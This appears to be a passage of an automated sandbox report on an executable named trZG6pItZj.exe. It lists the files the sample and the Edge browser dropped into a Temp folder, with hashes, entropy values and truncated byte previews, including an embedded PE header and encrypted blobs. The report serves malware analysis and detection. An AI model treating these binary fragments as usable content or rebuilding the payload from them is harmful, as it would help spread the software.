                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                  Preview:....C.......s3.P..................P......h....P.r......2..,.................j...3.P..................P......h....P./..........................tz3..t...3.....................A;.u..tR..ss..............C.......1....................j.P......h....P................................9.}.+.j.3..d....^..3.A........`...........\...................&v.j&X....N!J...4.O!J............W..1............j.P..c.......P..........L!J....H.J.P........P.N........3.B...;..............uC3.P........\.........Ph......`...P.........\......................9.....u...........t.3.3..........`.......`......G..;.u........`.....\...A..\.........;.........`..........\......P............P..`...WP........3...u.P........\.........PW.#.....\...@......;...+.......#.........3.3......`.......`......G..;.u...............\.....s..*...3.P........\.........P..`...h....P.Q.....\......2.....;...........uy..`.......................u.........3.3.......9.......%.........+.........................u%;.......!.......W.......

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Night

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:Targa image data 19 x 8 x 8 +19 +19 "\023"
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):131072
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.744731530331674
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:D/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8qcDh:HKaj6iTcPAsAhxjgarB/5el3EYr+
                                                                                                                                                                                                                                                                                                  MD5:9C30E32FFCE2AA493EF4238A2BA1FDAF
                                                                                                                                                                                                                                                                                                  SHA1:282D80B3D0481BD1FACAD68EE6AE344E4001122B
                                                                                                                                                                                                                                                                                                  SHA-256:55E244354B1483FC405522D97EDE1C752C6B8F288A17D4FF32CB410C6ED48404
                                                                                                                                                                                                                                                                                                  SHA-512:8B17C56AAB1EB5AC2AAFAC6F7C92CB9AFC76DAF409574C34CCB7C0D027E6705CD62510DB35DFE1AAB60DA96130D4B94DE9450BA92911323042CDE548B596E2B9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:....................................................................................................................................................................................................................................................................................................................................................................................................................................................................r.r.r.r.r...............................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.......................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Posting

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):35158
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.994885764726237
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:768:3vxVBcQYfpcf0WQqF0S8n/raX8IyIF5YeN+mDsBo+7Y6PybMq74IIjO42:3Z3pYhcf0WIDWMINl+AbMQ8OP
                                                                                                                                                                                                                                                                                                  MD5:94A5A552EFE142146E3A98ADEBC6002F
                                                                                                                                                                                                                                                                                                  SHA1:018FD52A873DEAF40D37CE5894C30492F90FAD9D
                                                                                                                                                                                                                                                                                                  SHA-256:2028CD9387AC54BBD6929857FC52D994531D7E2D05AB7D1AB5DD35B06EE44D52
                                                                                                                                                                                                                                                                                                  SHA-512:52076D5003172B51E35C9D2FE85D65D3B18E377F6DCD0EB47DD4A91CD44CEB1BC187CECA84DCE32FB39676A247DA3C280E57B6F3E1E40FE21DAFA37C3CCB605D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:/....Zh.p9..eD0.."{Y...v..s...;.<.>........K.T`9/.v....6X~...z..(..!.M}^].i....V..Q1.Y...Q.K-.L~.........k.....~...n.)..d....@.0.&...qG.i.O..y.hb..gWU^c....Sq..a...*g..%..;....4....B..M..p ..7.`..>a...7..a.I.\..<i.j.....3.WDt....w..i....^.m....vm.X^...$..,7.kW@.Y$........rOB.]".nV..GA{$-.......j.D6zxPy1.."........sc........m]a.j....@...U..+.....^W.....)5..!......f.KH.....{......q..?. .....6...7o.2..m..'2.......oA9lW...:.....9...Ye...v...)..n1i.t...Z....Z..1........2.24.^...~.}..X7P9..~..l...Y..w.!e.....-E..i.:....&.<...<k#wE+.3.....(>.....IV..S.*.+*.G?.b...X...R\Yt.....U|.c]......>8..v.*b.pm..<z..=......QM/.i.w<x..}.k...<.jhsZ..G.+/..W~...&..<.....-sO./~.?y.du.[.Oc..oJ.......rMsw.+*.m.rN....J4..qUn.`.....5vnc...2.y.|...F..1..j.{....-....g.e.e....D.2.+...w.t.."...$..>>.J..w...s7...cF.~>..U.3...F.Z..Ai2..f=i.O...3.c....3..IV..&-....G/@..v..!.D...:.(:O.h..rb(/.@...xo....R.;....j.o..1..u...b`.r.4.._..u}e#bS...o.I;~Dv.ZW.2. J.m....sV..F

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Ron

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2375
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.277576828055318
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:a9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJci:aSEA5O5W+MfH5S1CqlVJci
                                                                                                                                                                                                                                                                                                  MD5:3072F9007A0EC1D4F38505C4053581F4
                                                                                                                                                                                                                                                                                                  SHA1:C6B7FAFC0FFF4E0BD8E11281FA2871EDFFB6E60B
                                                                                                                                                                                                                                                                                                  SHA-256:0A48E97F5221173353BC56E28BA0BFE5D9037DC71DD0DF6B0647E6B8C7D104BC
                                                                                                                                                                                                                                                                                                  SHA-512:4C9260FA5027F13DF6E563FFC8D8A639C0AE05A41A3E72968C802CFA9F4F00ED6C314764851B83309944DCA2CE8917E678F9CD6E122EB239248FA89DA2C2FDDD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:Frame........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Surgery

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):61440
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.997183352215181
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:XyJPsjjtU2jOw1cOmYgmObUGW/HcXG308:X7/tULKc/UEe
                                                                                                                                                                                                                                                                                                  MD5:9D729FA7DCC31DD7E20873436D29FDE4
                                                                                                                                                                                                                                                                                                  SHA1:06AD28E52C9F7E09D0FD264C42A03C779AAAAA03
                                                                                                                                                                                                                                                                                                  SHA-256:64263C0CE8DB87F1CCEA789D3FD14ABBC170E2F787E2FF5EDA987BD53101233B
                                                                                                                                                                                                                                                                                                  SHA-512:A652AF0BAECC03B2CF5D8098A59CF55DA35111C8B70A8B5788FD7D005D4AB612BF43C81AB7D10FF3898A917A00948C4700CFF93D7E72227BA6583C9118C7B69A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:GF.W.......T^...&....*..M.'.dR......k.5..b.;_..2.....(J.=..#.r!.....N.?C.-....V..... <s.*+...b.6)...6.c5.w.l....O..........y.q....,*_b.....GPS....x..*[6Wh.\....a:.C.k....y.....-.Q..e...}j.kO.l...l...L.UO[/9.L......b...rb.AF../...XJjTi......EUbox......T.u....t...og.....)..m ..{....v.t.H./.l..>.u.!].........,bD.-....6..).;....&(.^..cY"A....L+.t..G.Oa.hW9..d.$.W.......c.[>x......gy.....FH...x.a..r......%..P...Fe....~....M..w.=...LF!.s.?9G..xbc;xGSwo...m.s..Q.Naq.>5....8..c.ZA..6.r....U./4~|...\*@..;........}.f...U.YO......U.v3=......;p...YC..=.L.K"..oL..........g.,.n?.H.....u=.....`....a.....3..u..u.....}.X.Y6b...P........./.H.Q.....B.!.X >.9l..\w.v|.=(..........p.y.Nk."...U. ....e.@.o#..+.:....'.A.......W...(.<..$..?p(....sQ.rb.p...;k...G ..5.]_.jY.:...b.......2...o^.N..$..#..a..Y.n.*.. ?.z.;2....t.+....r...].6.L..a..n|1:Y.I..D.-..~.'..n.....O.A.......Q.'H...-.Y.T..X...;...@..Q..Ao..*.D.N..~.....2.../.9..z..O...t.CR...|@....Cm.BCA..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Transparency

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):120832
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.328059435722378
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:fg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDy:Y5vPeDkjGgQaE/loUDy
                                                                                                                                                                                                                                                                                                  MD5:E88A09FD9D9939BB263A692F5C2AC5BF
                                                                                                                                                                                                                                                                                                  SHA1:50AFE54C82C2754A011B6002FC42060686E22055
                                                                                                                                                                                                                                                                                                  SHA-256:B896CA8A3F7D9EF0D96B8193BFA66EDBAE86BBA71AE05123E50BFE858CD02F66
                                                                                                                                                                                                                                                                                                  SHA-512:089F5F5406DF18921865C385F52C3BF3750F6E0B479B47B3E4B7BE68362EA0AF963002221BD872C890F058896D8CD2C71B6A89E14047C6928AEF5271E3FED4C2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h....V.C...YY..^...U..VW.}.........M...tF.E.S..t.;.....uH.^.....Q.........;...a...........h....V......E.YY..t.[j.j..7..X.I._^].....u.........M...t...6..V..j..N..V..F..4......F.YY.N.^.$...SVW..j._..l...............u.Nl.....N(...h....V.U...YY_..^[...U...u...(M......U...t...@)M.......y..u&...)M...u...M...

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\bc9e740b-b6af-4e84-983d-c20975a42be8.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2110
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.4074890274985
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rr3:8e2Fa116uCntc5toYe15M
                                                                                                                                                                                                                                                                                                  MD5:6678414A6140AF75D1206F65959BF1EE
                                                                                                                                                                                                                                                                                                  SHA1:53D55C411AF660BD1114600494BC89A7544A8BFB
                                                                                                                                                                                                                                                                                                  SHA-256:CDF8781DE0CA18CB25CDCCCFBEBEF1A72497624F5F88A930CEBB673B4C798919
                                                                                                                                                                                                                                                                                                  SHA-512:330091B796407146356236367EE9F702A0AB778E1BA4A8377F70CCDCF99BB4904A4804DF88611029ABA67940DE8C919E165C09876E9F98AE9351707EED84CB64
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\d0dab4b7-edc4-4820-aade-70f5b292679d.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ed033bee-9d6c-42f9-a530-5fbd4b36287e.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\f1c555ff-a0f7-40f2-a6ce-e428647edafa.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4982
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):908
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                  MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                  SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                  SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                  SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1285
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                  MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                  SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                  SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                  SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
